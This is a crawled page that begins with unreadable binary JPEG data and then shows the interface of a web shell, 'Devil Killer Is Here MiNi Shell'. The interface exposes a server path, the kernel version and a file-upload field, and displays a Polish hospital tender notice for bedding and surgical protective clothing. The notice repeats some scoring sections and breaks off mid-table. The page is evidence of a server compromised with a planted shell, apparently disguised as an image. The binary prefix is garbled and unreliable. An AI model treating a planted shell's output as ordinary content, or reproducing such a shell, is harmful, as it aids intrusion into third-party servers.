JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240617/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240617/0036940901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA POŚCIELI SZPITALNEJ ORAZ ODZIEŻY OCHRONNEJ NA BLOK OPERACYJNY </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Szpital Kliniczny Nr 1 Im. Prof. Stanisława Szyszko Śląskiego Uniwersytetu Medycznego w Katowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271566088</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 - go Maja 13-15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabrze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/ 370-42-41</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 370-45-22</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubli@szpital.zabrze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.zabrze.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA POŚCIELI SZPITALNEJ ORAZ ODZIEŻY OCHRONNEJ NA BLOK OPERACYJNY </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1f606061-2c8f-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00369409</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00566103/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.30 Dostawa pościeli</p> <p class="mb-0">1.2.32 Dostawa odzieży i obuwia ochronnego dla personelu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital.zabrze <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym, a wykonawcami odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość<br/>do zamawiającego”. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format<br/>plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">1. Wykonawca przekazuje próbkę przed terminem składania ofert, za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23<br/>listopada 2012 roku Prawo pocztowe, posłańca lub osobiście poprzez doręczenie do siedziby Zamawiającego – budynek nr 33, II<br/>piętro, pok. 19, KANCELARIA, z zastrzeżeniem, że siedziba Zamawiającego otwarta jest dla interesantów wyłącznie w dni robocze<br/>(od poniedziałku do piątku), z wyjątkiem dni wolnych od pracy, w godzinach 07:00 – 14.35.<br/>2. W przypadku doręczenia próbki po terminie składania ofert, próbka zostanie zwrócona Wykonawcy bez jej otwierania.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozp. Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przet. danych osob. i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozp. o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że: administratorem Pani/Pana danych osob. zawartych w ofercie złożonej do postępowania przetargowego znak<br/>ZP/53/TP2/2024 pn.: „DOSTAWA POŚCIELI SZPITALNEJ ORAZ ODZIEŻY OCHRONNEJ NA BLOK OPERACYJNY&#34;, jest SPSK Nr 1 im. prof. S. Szyszko SUM w Katowicach, z siedzibą w Zabrzu, przy ul. 3-go Maja 13-15 (dalej jako: SPSK Zabrze);<br/>* Może Pan / Pani skontaktować się z IOD za pomocą adresu e-mail: iod@szpital.zabrze.pl<br/>* Pani/Pana dane osob. przetwarzane będą na podstawie art. 6 ust. 1 lit. b) i c) RODO w celu przeprowadzenia postępowania i udzielenia zamówienia publicznego, znak: ZP/53/TP2/2024 prowadzonym w trybie podstawowym wariant 2;<br/>* dane udostępnione przez Pana/Panią mogą być udostępniane osobom uprawnionym na podstawie obowiązujących przepisów<br/>prawa, w szczególności art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11.09.2019 r. – Pzp (Dz. U. z 2023 r. poz. 1605), dalej „ustawa Pzp.;<br/>* Pani/Pana dane osob. będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>* obowiązek podania przez Panią/Pana danych osob. bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>* w odniesieniu do Pani/Pana danych osob. decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>* posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osob. Pani/Pana dotyczących.<br/>W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od Pani/Pana wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zam. publ. ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osob. z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego). Wystąpienie z<br/>żądaniem, o którym mowa w art. 18 ust. 1 RODO nie ogranicza przetwarzania danych osob. do czasu zakończenia postępowania o<br/>udzielenie zam. pub. lub konkursu.<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osob.<br/>Pani/Pana dotyczących narusza przepisy RODO;<br/>* nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osob.;<br/>- prawo do przenoszenia danych osob., o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osob., gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osob. jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/53/TP2/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa pościeli dla pacjentów, zgodnie z opisem znajdującym się w części III SWZ, formularzu ofertowym stanowiącym załącznik nr 1, szczegółowym formularzu ofertowym stanowiący załącznik 1a do SWZ oraz wzorem umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39512000-4 - Bielizna pościelowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena<br/>Liczba punktów badanej oferty w ramach kryterium <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/><br/>Termin dostawy:<br/>Liczba punktów:<br/>Od 11 do 14 dni roboczych – 0 pkt<br/>do 10 dni roboczych włącznie – 1 pkt<br/>Liczba punktów badanej oferty w ramach kryterium = (Ro/R max) x 100 x waga<br/>Gdzie:<br/>Ro – ilość punktów oferty badanej<br/>R max – najwyższa ilość punktów spośród ważnych ofert<br/><br/>UWAGA:<br/>Zamawiający wymaga terminu dostawy nie dłuższego niż 14 dni roboczych. <br/>W przypadku, gdy Wykonawca w formularzu oferty nie poda terminu dostawy, Zamawiający przyjmie do obliczeń maksymalny termin tj. 14 dni roboczych.<br/><br/>Liczba punktów badanej oferty w ramach kryterium <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/><br/>Termin dostawy:<br/>Liczba punktów:<br/>Od 11 do 14 dni roboczych – 0 pkt<br/>do 10 dni roboczych włącznie – 1 pkt<br/>Liczba punktów badanej oferty w ramach kryterium = (Ro/R max) x 100 x waga<br/>Gdzie:<br/>Ro – ilość punktów oferty badanej<br/>R max – najwyższa ilość punktów spośród ważnych ofert<br/><br/>UWAGA:<br/>Zamawiający wymaga terminu dostawy nie dłuższego niż 14 dni roboczych. <br/>W przypadku, gdy Wykonawca w formularzu oferty nie poda terminu dostawy, Zamawiający przyjmie do obliczeń maksymalny termin tj. 14 dni roboczych.<br/><br/>Jakość:<br/>Liczba punktów badanej oferty w ramach kryterium:<br/>J = (Jof/Jmax) x 100 x waga<br/>Gdzie:<br/>Jof – suma punktów cząstkowych przyznanych badanej ofercie<br/>J max – najwyższa liczba sumy punktów cząstkowych spośród wszystkich nieodrzuconych ofert.<br/>Punkty zostaną przyznane w następujący sposób:<br/>W zakresie zadania nr 1:<br/><br/>Parametry do oceny	Wartość punktowa <br/>wagi kryterium<br/>Ocena tkaniny pod kątem pylenia - czy podczas wstrząsania zauważa się unoszące się drobiny pyłu <br/>z materiału.	5, 3, 0<br/>Gładkość płaszczyzn między szwami	5, 3, 0<br/>Ocena zabezpieczenia szwów przed pruciem	5, 3, 0<br/>Ocena tkaniny pod kątem jednolitej struktury – czy w materiale nie występują zgrubienia i skazy	5, 3, 0<br/><br/>W zakresie zadania nr 2:<br/>Parametry do oceny	Wartość punktowa <br/>wagi kryterium<br/>Ocena tkaniny pod kątem pylenia - czy podczas wstrząsania zauważa się unoszące się drobiny pyłu <br/>z materiału.	5, 3, 0<br/>Gładkość płaszczyzn między szwami	5, 3, 0<br/>Ocena zabezpieczenia szwów przed pruciem	5, 3, 0<br/>Ocena symetryczności wykonania wszystkich elementów np. naszycia kieszeni, gumek, pozostałych przeszyć, oznaczenie jednostki, metka	5, 3, 0<br/>Ocena tkaniny pod kątem prześwitów - czy po założeniu odzieży nie przeświecają części garderoby założone pod odzieżą 5, 3, 0<br/><br/>Ocena polega na zbadaniu próbki pod katem w/w elementów : <br/>- brak uwag do wymienionych elementów 5 pkt. <br/>- jedna uwaga 3 punkty , <br/>- dwie i więcej uwag 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa odzieży ochronnej na blok operacyjny, zgodnie z opisem znajdującym się w części III SWZ, formularzu ofertowym stanowiącym załącznik nr 1, szczegółowym formularzu ofertowym stanowiący załącznik 1a do SWZ oraz wzorem umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39512000-4 - Bielizna pościelowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena<br/>Liczba punktów badanej oferty w ramach kryterium <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/><br/>Termin dostawy:<br/>Liczba punktów:<br/>Od 11 do 14 dni roboczych – 0 pkt<br/>do 10 dni roboczych włącznie – 1 pkt<br/>Liczba punktów badanej oferty w ramach kryterium = (Ro/R max) x 100 x waga<br/>Gdzie:<br/>Ro – ilość punktów oferty badanej<br/>R max – najwyższa ilość punktów spośród ważnych ofert<br/><br/>UWAGA:<br/>Zamawiający wymaga terminu dostawy nie dłuższego niż 14 dni roboczych. <br/>W przypadku, gdy Wykonawca w formularzu oferty nie poda terminu dostawy, Zamawiający przyjmie do obliczeń maksymalny termin tj. 14 dni roboczych.<br/><br/>Liczba punktów badanej oferty w ramach kryterium <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/><br/>Termin dostawy:<br/>Liczba punktów:<br/>Od 11 do 14 dni roboczych – 0 pkt<br/>do 10 dni roboczych włącznie – 1 pkt<br/>Liczba punktów badanej oferty w ramach kryterium = (Ro/R max) x 100 x waga<br/>Gdzie:<br/>Ro – ilość punktów oferty badanej<br/>R max – najwyższa ilość punktów spośród ważnych ofert<br/><br/>UWAGA:<br/>Zamawiający wymaga terminu dostawy nie dłuższego niż 14 dni roboczych. <br/>W przypadku, gdy Wykonawca w formularzu oferty nie poda terminu dostawy, Zamawiający przyjmie do obliczeń maksymalny termin tj. 14 dni roboczych.<br/><br/>Jakość:<br/>Liczba punktów badanej oferty w ramach kryterium:<br/>J = (Jof/Jmax) x 100 x waga<br/>Gdzie:<br/>Jof – suma punktów cząstkowych przyznanych badanej ofercie<br/>J max – najwyższa liczba sumy punktów cząstkowych spośród wszystkich nieodrzuconych ofert.<br/>Punkty zostaną przyznane w następujący sposób:<br/>W zakresie zadania nr 1:<br/><br/>Parametry do oceny	Wartość punktowa <br/>wagi kryterium<br/>Ocena tkaniny pod kątem pylenia - czy podczas wstrząsania zauważa się unoszące się drobiny pyłu <br/>z materiału.	5, 3, 0<br/>Gładkość płaszczyzn między szwami	5, 3, 0<br/>Ocena zabezpieczenia szwów przed pruciem	5, 3, 0<br/>Ocena tkaniny pod kątem jednolitej struktury – czy w materiale nie występują zgrubienia i skazy	5, 3, 0<br/><br/>W zakresie zadania nr 2:<br/>Parametry do oceny	Wartość punktowa <br/>wagi kryterium<br/>Ocena tkaniny pod kątem pylenia - czy podczas wstrząsania zauważa się unoszące się drobiny pyłu <br/>z materiału.	5, 3, 0<br/>Gładkość płaszczyzn między szwami	5, 3, 0<br/>Ocena zabezpieczenia szwów przed pruciem	5, 3, 0<br/>Ocena symetryczności wykonania wszystkich elementów np. naszycia kieszeni, gumek, pozostałych przeszyć, oznaczenie jednostki, metka	5, 3, 0<br/>Ocena tkaniny pod kątem prześwitów - czy po założeniu odzieży nie przeświecają części garderoby założone pod odzieżą 5, 3, 